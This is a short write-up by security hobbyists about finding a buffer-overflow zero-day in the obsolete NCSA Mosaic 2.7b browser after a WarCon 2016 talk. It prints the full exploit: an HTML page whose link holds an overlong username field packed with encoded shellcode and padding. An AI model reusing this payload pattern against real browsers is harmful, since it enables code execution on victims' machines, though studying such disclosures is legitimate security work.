While attending WarCon in 2016, greg and I sat together in .mario’s talk "My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, “e”". His rants about MSIE reminded us that we both still had the task of finding a Mosaic 0day on our agenda. So the evening after the talk we sat down together and started working toward that goal.
The latest version of Mosaic for Unix which can be found at
ftp://ftp.ncsa.uiuc.edu/Mosaic/Unix/binaries/2.7b/ is 2.7b, released
roughly 24 years ago. So we got the static binary for Linux and threw it into a
somewhat recent 32-bit Ubuntu VM.
It took us a few time-units to get a first crash with a long username part in an
HTTP link. Roughly 1½ hours after we started we could pop
via that buffer overflow.
The finished exploit looks like this:
<html> <head> </head> <body> <a href="http://çÚÙÙwôYIIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISZ4KF8Z9Sbe658VM0ck9iwrHvOcCqxGp2H6OQr3YpnLIkSSbHhuN5Ps07paTw9f3RpBlaQbyumTzfPDn4pUp2GRNPoRM55vMcSE1BLpccE0l1qcD0od25P67RsOyyqjmmPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJORNFUCm³éïþÿÿ@">kek</a> </body> </html>
The day after we dropped that “0day” on stage for the WarCon crowd =).